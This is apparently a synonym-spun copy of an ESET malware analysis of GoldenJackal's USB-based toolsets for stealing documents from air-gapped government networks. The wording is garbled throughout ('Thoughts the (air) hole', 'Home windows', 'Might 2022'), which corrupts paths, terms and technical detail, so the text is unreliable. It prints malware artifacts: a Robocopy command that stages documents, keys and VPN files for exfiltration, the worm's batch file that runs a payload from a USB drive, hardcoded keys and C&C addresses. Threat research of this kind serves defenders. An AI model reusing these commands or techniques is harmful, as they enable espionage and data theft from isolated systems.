Thoughts the (air) hole: GoldenJackal gooses authorities guardrails

ESET researchers found a collection of assaults on a governmental group in Europe utilizing instruments able to focusing on air-gapped programs. The marketing campaign, which we attribute to GoldenJackal, a cyberespionage APT group that targets authorities and diplomatic entities, occurred from Might 2022 to March 2024. By analyzing the toolset deployed by the group, we have been capable of determine an assault GoldenJackal carried out earlier, in 2019, towards a South Asian embassy in Belarus that, but once more, focused the embassy’s air-gapped programs with customized instruments.

This blogpost introduces beforehand undocumented instruments that we attribute to GoldenJackal based mostly on victimology, code, and purposeful similarities between the toolsets.

Key factors of the blogpost:

• GoldenJackal used a customized toolset to focus on air-gapped programs at a South Asian embassy in Belarus since at the least August 2019. On this blogpost, we describe these instruments publicly for the primary time.
• This blogpost additionally options the primary public description of a extremely modular toolset GoldenJackal deployed on numerous events between Might 2022 and March 2024 towards a nationwide authorities group of a rustic within the European Union.
• These toolsets present GoldenJackal a large set of capabilities for compromising and persisting in focused networks. Victimized programs are abused to gather fascinating data, course of the data, exfiltrate information, and distribute information, configurations and instructions to different programs.
• The last word objective of GoldenJackal appears to be stealing confidential data, particularly from high-profile machines which may not be linked to the web.

GoldenJackal profile

GoldenJackal is an APT group lively since at the least 2019. It targets authorities and diplomatic entities in Europe, the Center East, and South Asia. The group is little recognized and has solely been publicly described in 2023 by Kaspersky. The group’s recognized toolset contains a number of implants written in C#: JackalControl, JackalSteal, JackalWorm, JackalPerInfo, and JackalScreenWatcher – all of them used for espionage.

Overview

In Might 2022, we found a toolset that we couldn’t attribute to any APT group. However as soon as the attackers used a software much like a kind of publicly documented by Kaspersky, we have been capable of dig deeper and to discover a connection between the publicly documented toolset of GoldenJackal and this new one.

Extrapolating from that, we managed to determine an earlier assault the place the publicly documented toolset was deployed, in addition to an older toolset that additionally has capabilities to focus on air-gapped programs. This blogpost shines a light-weight on the technical features of the publicly undocumented toolsets, and shares some insights about GoldenJackal’s techniques, strategies, and procedures.

Victimology

GoldenJackal has been focusing on governmental entities in Europe, the Center East, and South Asia. We detected GoldenJackal instruments at a South Asian embassy in Belarus in August and September 2019, and once more in July 2021.

Kaspersky reported a restricted variety of assaults towards authorities and diplomatic entities within the Center East and South Asia, beginning in 2020.

Extra just lately, in response to ESET telemetry, a nationwide authorities group of a rustic within the European Union was repeatedly focused from Might 2022 till March 2024.

Attribution

All of the campaigns that we describe on this blogpost deployed, in some unspecified time in the future, at the least one of many instruments attributed to the GoldenJackal APT group by Kaspersky. As was the case within the Kaspersky report, we are able to’t attribute GoldenJackal’s actions to any particular nation-state. There may be, nonetheless, one clue which may level in the direction of the origin of the assaults: within the GoldenHowl malware, the C&C protocol is known as transport_http, which is an expression sometimes utilized by Turla (see our ComRat v4 report) and MoustachedBouncer. This may occasionally point out that the builders of GoldenHowl are Russian audio system.

Breaching air-gapped programs

As we acknowledged in a earlier white paper titled Jumping the air gap: 15 years of nation-state effort, compromising an air-gapped community is way more resource-intensive than breaching an internet-connected system, which implies that frameworks designed to assault air-gapped networks have to date been completely developed by APT teams. The aim of such assaults is at all times espionage, maybe with a side of sabotage.

With the extent of sophistication required, it’s fairly uncommon that in 5 years, GoldenJackal managed to construct and deploy not one, however two separate toolsets designed to compromise air-gapped programs. This speaks to the resourcefulness of the group. The assaults towards a South Asian embassy in Belarus made use of customized instruments that we’ve got solely seen in that particular occasion. The marketing campaign used three primary elements: GoldenDealer to ship executables to the air-gapped system through USB monitoring; GoldenHowl, a modular backdoor with numerous functionalities; and GoldenRobo, a file collector and exfiltrator.

Within the newest collection of assaults towards a authorities group in Europe, GoldenJackal moved on from the unique toolset to a brand new, extremely modular one. This modular strategy utilized not solely to the design of the malicious instruments (as was the case with GoldenHowl), but additionally to their roles: they have been used, amongst different issues, to gather and course of fascinating data, to distribute information, configurations, and instructions to different programs, and to exfiltrate information.

Technical evaluation

Preliminary entry

To this point, we haven’t been capable of hint again to the preliminary compromise vector within the campaigns seen in our telemetry. Observe that Kaspersky reported in a blogpost that GoldenJackal used trojanized software program and malicious paperwork for this function.

The mysterious toolset from 2019

The earliest assault that we’ve got attributed to GoldenJackal, which focused a South Asian embassy in Belarus, occurred in August 2019. The toolset used on this assault is, to the most effective of our data, publicly undocumented. We’ve solely noticed the next customized instruments as soon as, and by no means once more:

• A malicious element that may ship executables to air-gapped programs through USB drives. We’ve named this element GoldenDealer.
• A backdoor, which we’ve named GoldenHowl, with numerous modules for malicious capabilities.
• A malicious file collector and exfiltrator, which we’ve named GoldenRobo.

An summary of the assault is proven in Determine 1. The preliminary assault vector is unknown, so we assume that GoldenDealer and an unknown worm element are already current on a compromised PC that has entry to the web. Every time a USB drive is inserted, the unknown element copies itself and the GoldenDealer element to the drive. Whereas we didn’t observe this unknown element, we’ve got seen elements with related functions – akin to JackalWorm – in different toolsets utilized in later assaults carried out by the group.

It’s possible that this unknown element finds the final modified listing on the USB drive, hides it, and renames itself with the identify of this listing, which is completed by JackalWorm. We additionally imagine that the element makes use of a folder icon, to entice the consumer to run it when the USB drive is inserted in an air-gapped system, which once more is completed by JackalWorm.

When the drive is once more inserted into the internet-connected PC, GoldenDealer takes the details about the air-gapped PC from the USB drive and sends it to the C&C server. The server replies with a number of executables to be run on the air-gapped PC. Lastly, when the drive is once more inserted into the air-gapped PC, GoldenDealer takes the executables from the drive and runs them. Observe that this time no consumer interplay is required, as a result of GoldenDealer is already working.

We’ve noticed GoldenDealer working GoldenHowl on an internet-connected PC. Whereas we didn’t observe GoldenDealer immediately executing GoldenRobo, we noticed the latter additionally working on the linked PC, used to take information from the USB drive and exfiltrate them to its C&C server. There have to be yet one more unknown element that copies information from the air-gapped PC to the USB drive, however we haven’t noticed it but.

GoldenDealer

This element screens the insertion of detachable drives on each air-gapped and linked PCs, in addition to web connectivity. Primarily based on the latter, it may obtain executable information from a C&C server and conceal them on detachable drives, or retrieve them from these drives and execute them on programs that haven’t any connectivity.

This system may be run with or with out arguments. When run with arguments, it takes a path to a file that it strikes to a brand new location after which runs through the CreateProcessW API with out making a window.

To forestall hidden information being proven in Home windows Explorer, GoldenDealer creates the ShowSuperHidden worth within the HKCUSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced registry key, and units it to zero.

In case GoldenDealer isn’t working as a service, it creates and begins a service known as NetDnsActivatorSharing, then exits. If for any cause the service couldn’t be created, persistence is achieved by creating an entry in a Run registry key.

Desk 1 reveals the record of configuration information utilized by GoldenDealer. These are situated within the listing from which the malware is working: C:WindowsTAPI within the noticed assault. Extra particulars about these information is offered in subsequent sections.

Desk 1. Configuration information utilized by GoldenDealer

The contents of configuration information are JSON formatted, and saved XOR encrypted on disk. XOR encryption is carried out one byte at a time, with a single-byte key that’s incremented based mostly on a multiplier.

Community connectivity thread

With a view to decide whether or not a PC is linked to the web, GoldenDealer sends a GET request to https://1.1.1.1/<user_id> each quarter-hour. If the connection fails, or there’s no reply, the PC is assumed to be offline. 1.1.1.1 maps to Cloudflare’s DNS resolver, and the anticipated habits is to obtain a Not Discovered doc and a 404 standing code. The <user_id> half isn’t related right here, however is used for C&C communication. GoldenDealer generates this consumer identifier based mostly on:

• The present username as discovered through the GetUserNameW API.
• The serial variety of the primary accessible logical drive within the system. This doesn’t essentially imply the drive the place the OS is put in.

These two strings are individually hashed with the FNV-1a operate, and the ensuing numbers are XORed collectively, acquiring a quantity that identifies the consumer.

To maintain observe of community connectivity standing, GoldenDealer makes use of a worldwide variable that may maintain any of the next values:

• 0 – Malware began working and connectivity has not been checked.
• 1 – PC doesn’t have web connectivity.
• 2 – PC has web connectivity.

If the standing is 2, a thread is signaled to obtain executable information from the C&C server, and one other thread is signaled to repeat the executables to USB drives. A thread to get executables from drives and run them will solely be signaled when the standing is 1. Every time the standing modifications, the configuration file b8b9-de4d-3b06-9d44 is up to date with the brand new worth. Fields on this file are:

• wmk – community connectivity standing.
• qotwnk – variety of seconds with out web. This worth is incremented each quarter-hour and reset to zero when there’s connectivity. It may be used if the malware is configured to attend a minimal variety of seconds earlier than deciding that the PC has no connectivity, however there was no wait within the samples that we noticed.
• ltwnk – unknown. This subject isn’t utilized by the malware.
• rpk – record with hashes of executables downloaded from the C&C server.

Downloader thread

This thread checks the community connectivity standing each half-hour, and solely performs the next actions if the PC is linked to the web. First, a GET request is shipped to https://83.24.9[.]124/<user_id>, simply to let the C&C server know that one other request is to comply with. The reply from the server isn’t processed. If the request fails, then one other request is shipped to a secondary server, http://196.29.32[.]210/<user_id>, in all probability to inform about failure, because the thread doesn’t proceed to execute on this case. The URLs are hardcoded within the malware and aren’t configurable within the samples that we noticed.

When communication is profitable, GoldenDealer sends a request to https://83.24.9[.]124/<user_id>/fc93-10f4-2a68-d548. The server replies with an array of JSON objects with the next fields:

• ek – a base64-encoded string that’s an executable file after being decoded,
• tpik – an array of user_ids used to resolve whether or not the executable will likely be run,
• hek – the FNV-1a hash of ek, and
• apk – date and time when the executable was obtained from the C&C server.

The contents of the final two fields aren’t related, as a result of they’re calculated by the downloader thread, changing unique knowledge despatched by the C&C server. In each circumstances, they’re saved as decimal numbers.

GoldenDealer will run an executable despatched by the server if the corresponding user_id is within the tpik record, and the hek hash isn’t within the record of hashes saved within the rpk subject within the configuration. In different phrases, linked PCs can obtain executables and move them alongside to different programs through USB drives, however they will additionally run acquired executables. When an executable is run, its hash is added to the rpk record, making certain that it’s going to solely be executed as soon as by that sufferer. Every executable is written within the working listing with the worth of <hek> as its filename. All JSON objects with acquired executables are saved on disk, within the file fb43-138c-2eb0-c651.

As the ultimate step, the downloader thread collects details about the compromised system and sends it to https://83.24.9[.]124/<user_id>/a1e7-4228-df20-1600. The configuration file 130d-1154-30ce-be1e is up to date to retailer this data as effectively. Determine 2 reveals a part of the JSON object with the data despatched to the C&C server. Whereas all strings are despatched as arrays of decimal character codes, for readability we present them as strings within the picture. For instance, as an alternative of lsass.exe, the worth [108, 115, 97, 115, 115, 46, 101, 120, 101] is definitely despatched.

The members are:

• iepk – a Boolean worth that signifies whether or not the GoldenDealer course of is elevated,
• pclk – an array of working processes,
• pglk – an array of put in applications in each Program Information and Program Information (x86) directories,
• pik – the user_id,
• sik – details about the working system (together with model, construct, service pack quantity; structure; and Boolean values indicating whether or not the OS is working on a server, area controller, or workstation),
• uck – the consumer who’s working the GoldenDealer course of, and
• ulk – an array of all customers, every with a Boolean worth indicating whether or not the consumer has administrator privileges.

USB monitoring thread on linked PCs

GoldenDealer screens the insertion of detachable drives by making a window titled defaultWindow with a customized occasion handler that processes inserted gadgets and ignores all different system occasions.

As soon as a USB drive has been inserted, this thread patches one byte within the grasp boot report (MBR) of that drive: it searches for the offset the place the BOOTMGR string resides, and replaces the primary O with 0. Then it checks whether or not the second O has additionally been patched to 0, and exits if it hasn’t. The USB thread that runs on air-gapped PCs does the alternative: it patches the second O, and checks whether or not the primary has already been patched. Which means that the USB drive must have been inserted in each a linked PC and an air-gapped PC for the drive to be processed.

If the verify is profitable, a hidden listing is created on the USB drive, with two information written inside:

• 37b3-ebe5-568e-0676 – this file has the identical contents as fb43-138c-2eb0-c651 (all of the executables despatched by the C&C server). It’s used to move the executables to air-gapped programs, for execution.
• bc41-ac6f-e55e-61a8 – a file with data from air-gapped PCs. It’s created empty by this thread, then populated by the USB thread working on air-gapped PCs. The contents of this file are appended to the native file 130d-1154-30ce-be1e (see Desk 1), to be despatched to the C&C server by the downloader thread.

USB monitoring thread on air-gapped PCs

That is complementary to the thread described within the earlier part: it takes the file 37b3-ebe5-568e-0676 with executables on the USB drive and copies its contents to the native file fb43-138c-2eb0-c651. It additionally takes the native file 130d-1154-30ce-be1e with details about the air-gapped system and provides its contents to the bc41-ac6f-e55e-61a8 file on the USB drive. The code to acquire system data and to run executables is contained on this thread.

GoldenHowl

One other software from GoldenJackal’s 2019 toolset is GoldenHowl, a backdoor written in Python that consists of assorted modules for malicious functionalities. It’s distributed as a self-extracting archive that accommodates official Python binaries and libraries, in addition to malicious scripts. Determine 3 reveals the contents of considered one of these archives. The attackers renamed the Python executable – in model 2.7.15 – as WinAeroModule.exe. This element is meant to be run on PCs with web connectivity, given its functionalities.

The preliminary script in GoldenHowl, known as core_script within the malware’s configuration file, performs the next actions:

• decrypts and masses the malware’s configuration from a JSON file,
• creates directories utilized by the malware, and
• begins a thread for every module.

The malware’s configuration is decrypted utilizing the Fernet algorithm, with the hardcoded key _ylmUTbqcx6FxMZ5ZvNxDQZYuNh41yxhKcPJLzxgqEY=. Determine 4 reveals a part of the decrypted configuration.

Desk 2 reveals the Python modules that we’ve noticed – within the order that they seem within the config – together with an outline of their functionalities. All modules run indefinitely, aside from the persistence_schtasks module, which runs solely as soon as.

Desk 2. Malicious modules in GoldenHowl

C&C communication

The final of the noticed instruments from the 2019 toolset, GoldenRobo, is a straightforward element written in Go that executes the Robocopy utility to stage information and ship them to its C&C server. It iterates throughout all drive letters from A to Z, making an attempt to entry every drive. If profitable, a Robocopy command is constructed:

robocopy <drive_letter>: <malware_folder>1516-fe89-ad12-8102<drive_letter> *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.pdf *.rtf *.tif *.jpg *.jpeg *.crt *.key *.p12 *.ovpn *.zip *.rar “” /S /R:0 /MAXAGE:7 /XD <malware_folder>1516-fe89-ad12-8102 1516-fe89-ad12-8102 “Software Information” “All Customers” “Paperwork and Settings” “Native Settings”

If we break down the command:

• information are copied from drive_letter,
• to <malware_folder>1516-fe89-ad12-8102<drive_letter> (for instance: C:WindowsTAPI1516-fe89-ad12-8102C),
• provided that the information have extensions .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pdf, .rtf, .tif, .jpg, .jpeg, .crt, .key, .p12, .ovpn, .zip, or .rar,
• together with subdirectories (/S),
• not retrying on failed copies (/R:0),
• excluding information older than seven days (/MAXAGE:7), and
• excluding specified directories (/XD).

Copied information from all drives are archived collectively in a ZIP file _1423-da77-fe86<month>-<day> in the identical listing the place GoldenRobo is working (with <month> and <day> equivalent to the present date).

The archive is shipped base64 encoded to https://83.24.9[.]124/8102/. The final a part of the URL is 8102, which is identical because the client_id subject in GoldenHowl’s configuration. This URL is hardcoded in GoldenRobo, which tells us that the attackers compiled this model of GoldenRobo for this sufferer completely.

The recognized toolset: Beforehand documented by Kaspersky

Just a few weeks after deploying the earlier toolset, GoldenJackal began to make use of different malicious instruments on the identical compromised computer systems. In September 2019, we noticed the execution of PowerShell scripts to obtain the JackalControl backdoor. This backdoor was used to execute different PowerShell scripts, to obtain and run official instruments akin to Plink and PsExec.

In numerous assaults, between September 2019 and January 2024, we noticed the next instruments in GoldenJackal’s arsenal:

• JackalControl,
• JackalSteal, a file collector and exfiltrator, and
• JackalWorm, used to propagate different malicious elements through USB drives. We noticed it propagating the JackalControl backdoor.

As these elements have already been documented by Kaspersky, we won’t describe them on this blogpost. Nevertheless, one fascinating level to say is that in early variations of those instruments, URLs for C&C servers have been hardcoded within the malware binaries. In some unspecified time in the future, GoldenJackal modified JackalControl and JackalSteal to obtain C&C servers as arguments.

The newest toolset: Holding a foothold within the community

In Might 2022, we noticed GoldenJackal utilizing a brand new toolset whereas focusing on a governmental group in Europe. Most of those instruments are written in Go and supply various capabilities, akin to amassing information from USB drives, spreading payloads within the community through USB drives, exfiltrating information, and utilizing some PCs within the community as servers to ship various information to different programs. As well as, we’ve got seen the attackers utilizing Impacket to maneuver laterally throughout the community.

Within the noticed assaults, GoldenJackal began to make use of a extremely modular strategy, utilizing numerous elements to carry out completely different duties. Some hosts have been abused to exfiltrate information, others have been used as native servers to obtain and distribute staged information or configuration information, and others have been deemed fascinating for file assortment, for espionage functions. Determine 5 reveals a classification of the elements which are described over the subsequent sections.

Concerning community infrastructure, we didn’t observe any exterior IP addresses in any of the analyzed elements. File exfiltrators use publicly accessible providers akin to Google Drive or Outlook SMTP servers.

GoldenUsbCopy

GoldenUsbCopy, which we classify as a set element, screens the insertion of USB drives, and copies fascinating information to an encrypted container that’s saved on disk, to be exfiltrated by different elements. In line with strings discovered within the binary, the primary package deal for the applying is known as UsbCopy.

Newly inserted drives are detected by making a window with identify WindowsUpdateManager, to obtain system occasions and course of them with a customized handler. If the handler receives a WM_DEVICECHANGE message, with an occasion kind DBT_DEVICEARRIVAL, and the gadget kind is DBT_DEVTYP_VOLUME, this implies a brand new drive is able to be processed. Determine 6 reveals a side-by-side comparability between decompiled code in GoldenUsbCopy and GoldenDealer. Regardless that every was written in a unique programming language, we are able to see that the code retrieves the letter of the drive to course of in the identical method.

GoldenUsbCopy determines which information to course of from a USB drive based mostly on a configuration that’s saved AES encrypted in CFB mode within the file reviews.ini. The 32-byte key to decrypt the configuration is hardcoded within the malware. After decryption, the configuration accommodates the next fields, in JSON format:

• outputCipherFilename – full path to an encrypted archive that acts as a container for different information, akin to information that comprise listings of filenames from newly inserted drives, and information to be exfiltrated,
• RSAKey – a public key to encrypt AES keys which are used to encrypt information to be exfiltrated,
• lastDate – information that have been final modified greater than lastDate days in the past aren’t processed,
• registryKey – a key in HKEY_CURRENT_USER that may retailer SHA-256 hashes of information already processed for exfiltration,
• registryValue – the registry worth that shops the record of hashes,
• maxZIPSize – the utmost measurement in bytes for outputCipherFilename (extra particulars under),
• maxFileSize – information bigger than maxFileSize, in bytes, aren’t exfiltrated, and
• extensionsFile – an inventory of file extensions for exfiltration (we noticed .docx, .pdf, .doc, and .odt).

As soon as the configuration is decrypted, GoldenUsbCopy waits for a USB drive to be inserted. A list of all information on the inserted drive is written to a textual content file, which is then archived in a ZIP file, encrypted with AES, and added to outputCipherFilename. Solely the encrypted container is written to disk; intermediate steps, involving textual content information and archives, are saved in reminiscence.

The same process is completed for information on the drive that meet the factors for exfiltration: these information are archived collectively preserving their listing construction, encrypted with AES, and added to outputCipherFilename. When choosing information for exfiltration, an inventory with SHA-256 hashes is retrieved from the registry. If the hash of a file is in that record, the file isn’t exfiltrated. If the hash isn’t within the record, it’s added, in order that the file received’t be exfiltrated once more.

Every time including information to exfiltrate would exceed the maxZIPSize of outputCipherFilename, the surplus information aren’t added to the archive for exfiltration, however their paths are added to a textual content file that’s archived, encrypted, and added to outputCipherFilename.

Concerning encryption, every particular person archive that’s added to the encrypted container is encrypted with AES in CFB mode, with a key and an initialization vector (IV) which are randomly generated on the spot. Each the important thing and IV must be saved, however solely the bottom line is encrypted with RSAKey. Determine 7 reveals an instance of how these fields are saved within the encrypted container.

GoldenUsbGo

This element is similar to GoldenUsbCopy and appears to be a later model of it, based mostly on once we noticed them in our telemetry and evaluating Go variations used to compile them. Nevertheless, GoldenUsbGo achieves the identical performance with an easier implementation:

• There isn’t any configuration file. All standards for file choice are hardcoded within the malware:
  • if filename accommodates a particular phrase from an inventory, course of the file no matter all different standards (the record accommodates strings akin to move, login, and key),
  • else, file measurement have to be no larger than 20 MB,
  • the date the file was final modified have to be not more than 14 days in the past, and
  • the file extension have to be considered one of .pdf, .doc, .docx, .sh, or .bat.
• Insertion of detachable drives isn’t constantly monitored. A hardcoded record of drive letters is checked periodically to find out if they’ve an assigned quantity of D:, E:, F:, G:, or H:.
• The record of hashes of information that have been already processed is saved in reminiscence solely.
• There isn’t any measurement restrict for the encrypted container the place information are staged for exfiltration.
• Information aren’t archived however as an alternative are compressed with gzip. Each file contents and filenames are compressed. Determine 8 reveals how compressed knowledge is organized earlier than encryption.

The trail to the encrypted container is hardcoded within the malware:

C:Customers[redacted]appdatalocalSquirrelTempSquirrelCache.dat

The hardcoded username within the path, redacted above, together with the quick record of drives and particular filenames to course of, inform us that GoldenUsbGo was compiled and tailor-made for this explicit sufferer.

Compressed information are encrypted with AES in CFB mode with the hardcoded key Fn$@-fR_*+!13bN5. The construction is identical as in GoldenUsbCopy (proven in Determine 7) however with out the AES key. After compressing the information, GoldenUsbGo generates an inventory of all information on the inserted drive and provides it to the encrypted container, in the identical method as exfiltrated information. The filename for the itemizing is shaped from the present date and time, changing : with – (for instance, 15 Jan 24 13-21 PST).

GoldenAce

This element, which we categorized as a distribution software in Determine 5, serves to propagate different malicious executables and retrieve staged information through USB drives. Whereas it could possibly be used to focus on air-gapped programs, it’s not particularly constructed for that, versus GoldenDealer. It really works along with a light-weight model of JackalWorm and another unknown element.

GoldenAce periodically checks drives within the record G:, H:, I:, J:, Ok:, L:, M:, N:, P:, X:, Y:, and Z:, to seek out one that’s mapped to a quantity. Then it checks whether or not a trash listing exists within the root of that drive. If it doesn’t exist, it’s created as hidden, and a file known as replace is copied to that listing, from the identical location the place GoldenAce is working. The primary listing on the drive (in alphabetical order) that isn’t hidden is about to hidden, and a file known as improve is copied to the basis of the drive and renamed as <name_of_hidden_directory>.exe.

The file improve is definitely JackalWorm, an executable that makes use of a folder icon, and whose function is to repeat and run the replace file on one other system the place the USB drive is inserted. Not like the model of JackalWorm described by Kaspersky, this one could be very restricted: it doesn’t have code to watch drive insertions, and it can’t be configured to carry out numerous actions. When executed from the basis listing of a detachable drive, it opens the hidden folder in Home windows Explorer and writes a batch file to execute the payload in replace. Contents of this file, replace.bat, are proven in Determine 9.

@echo off
copy "<drive_letter>:trashreplace" "C:Customers%username%AppDataNativereplace.exe"
"C:Customers%username%AppDataNativereplace.exe" "<drive_letter>:trash"
:check1
@tasklist | findstr /i /b "replace.exe" >nul
@if %errorlevel%==0 goto check1
@del /f /q /a h "C:Customers%username%AppDataNativereplace.exe"
@del /f /q "C:Customers<username>AppDataNativereplace.bat"

Determine 9. Contents of replace.bat

We will see that replace is run and deleted, together with the batch file, as soon as it’s executed working. Whereas we didn’t observe the contents of the replace element, it’s possible that it collects information and phases them within the trash listing on the detachable drive, for the reason that path to that listing is handed as an argument to replace.

When GoldenAce finds that the listing trash already exists on a drive, as an alternative of copying information to the drive, it copies information within the trash listing to C:ProgramDataMicrosoftWindowsDeviceMetadataCache.

HTTP server

We noticed Python’s HTTP server, packaged with PyInstaller, being executed through C:Windowssystem32cmd.exe /Ok C:Windowsmsahci.cmd. Sadly, we didn’t observe the contents of the msahci.cmd file, so we don’t know the arguments handed for execution, such because the port for the server to pay attention on.

GoldenBlacklist

As a processing element, GoldenBlacklist downloads an encrypted archive from a neighborhood server, and processes e-mail messages contained in it, to maintain solely these of curiosity. Then it generates a brand new archive for another element to exfiltrate.

The URL to retrieve the preliminary archive is hardcoded: https://<local_ip_address>/update46.zip. The downloaded file is saved as res.out, and AES decrypted with the hardcoded key k9ksbu9Q34HBKJuzHIuGTfHL9xCzMl53vguheOYA8SiNoh6Jqe62F7APtQ9pE, utilizing a official OpenSSL executable.

The decrypted archive, update46.tar.gz, is extracted in reminiscence, and solely these information that match sure standards are written to a subdirectory tmp, within the listing the place the malware is working. Standards:

• The file doesn’t comprise any e-mail on a blocklist of e-mail addresses. That is executed to take away e-mail messages that come from senders that often aren’t fascinating. Whereas we are able to’t embody the complete record right here, it’s value mentioning that lots of the e-mail addresses are associated to newsletters and press releases. It’s vital to notice that the attackers will need to have been working for a while to construct an inventory like this.
• The file accommodates the string Content material-Kind: utility. That is to maintain e-mail messages which have attachments, akin to PDF information, Microsoft Workplace information, and archives, to call a couple of.

As soon as the information are chosen, GoldenBlacklist archives the tmp listing and encrypts it with openssl.exe, utilizing the identical encryption key because the one used to decrypt the preliminary archive. The ensuing file is archive.out. All intermediate information and folders are then deleted, in addition to openssl.exe, libssl-3-x64.dll, and libcrypto-3-x64.dll, all situated within the malware’s listing. This means that one other element that we didn’t observe copied these official binaries there within the first place.

GoldenPyBlacklist

GoldenPyBlacklist is a Python implementation of GoldenBlacklist. It was packaged with PyInstaller and the unique identify of the script is duplxer_black_list_for_external_use.py. Some variations to the opposite element are:

• the preliminary archive is written as ress.out,
• the important thing for decryption is identical, aside from a unique first character,
• the decrypted archive is extracted to the C:WindowsSystem32temp listing for processing,
• one extra criterion for file choice is added to course of solely filenames that finish in .msg (these are information created with Microsoft Outlook),
• information that don’t meet the factors are deleted,
• the ultimate archive is created with the 7-Zip archiver, and
• the ultimate encrypted file is known as ArcSrvcUI.ter.

GoldenMailer

Labeled as an exfiltration element, GoldenMailer exfiltrates information by sending emails with attachments to attacker-controlled accounts. It was written in Python and packaged with PyInstaller, and the unique identify of the script is send_to_hole.py. GoldenMailer connects to legitimate servers – both smtp-mail.outlook.com or smtp.office365.com – to ship e-mail messages, utilizing SMTP on port 587.

The configuration is learn from a file, C:ProgramDataMicrosoftWindowsCachescversions.ini, in the identical listing the place GoldenMailer is working. The configuration consists of the next 5 traces:

• e-mail handle to authenticate to the SMTP server, and to make use of as each sender and vacation spot handle,
• password to authenticate to the SMTP server,
• path to listing with archives to exfiltrate,
• base filename (e.g., press.pdf) used for archives to exfiltrate; these archives use the next naming conference: <base_filename>.<three_digit_sequence_number>, and
• variety of information to exfiltrate.

We observed that this configuration file was copied from one other PC within the native community. On condition that the configuration file signifies what number of archives can be found to be exfiltrated, we assume that these archives should even be copied over the community, separating the duties of assortment, distribution, and exfiltration. It’s possible that the configuration file is generated by the element in command of amassing information and creating archives for exfiltration, however we didn’t observe that element.

Determine 10 reveals an instance of an e-mail message despatched by GoldenMailer. The topic has a typo: it reads Press realese. The physique could be very easy and reads: Every day Information about Israel-Hamas conflict. These strings are hardcoded within the malware’s binary. Just one attachment is shipped per e-mail; if there are various archives to exfiltrate, one e-mail is shipped for every.

The configuration information that we noticed contained the next e-mail addresses:

• mariaalpane@outlook[.]com
• katemarien087@outlook[.]com
• spanosmitsotakis@outlook[.]com

GoldenDrive

Versus GoldenMailer, this element exfiltrates information by importing them to Google Drive. Mandatory credentials are present in two information, that are hardcoded within the malware: credentials.json, which accommodates fields akin to client_id and client_secret, and token.json, with fields akin to access_token and refresh_token. A reference to Google Drive’s API and a few code snippets within the Go programming language may be discovered here.

Much like GoldenMailer, this element can add just one file at a time. GoldenDrive is executed with an argument that gives the complete path to the file to add.

Conclusion

On this blogpost, we revealed two new toolsets utilized by the GoldenJackal APT group to focus on air-gapped programs of governmental organizations, together with these in Europe. Frequent functionalities embody the usage of USB drives to steal confidential paperwork.

Managing to deploy two separate toolsets for breaching air-gapped networks in solely 5 years reveals that GoldenJackal is a classy risk actor conscious of community segmentation utilized by its targets.

A complete record of indicators of compromise (IoCs) may be present in our GitHub repository.

For any inquiries about our analysis printed on WeLiveSecurity, please contact us at [email protected]. 

ESET Analysis provides personal APT intelligence reviews and knowledge feeds. For any inquiries about this service, go to the ESET Threat Intelligence web page.

IoCs

Information

Community

E-mail Addresses

• mariaalpane@outlook[.]com
• katemarien087@outlook[.]com
• spanosmitsotakis@outlook[.]com

MITRE ATT&CK strategies

This desk was constructed utilizing version 15 of the MITRE ATT&CK framework.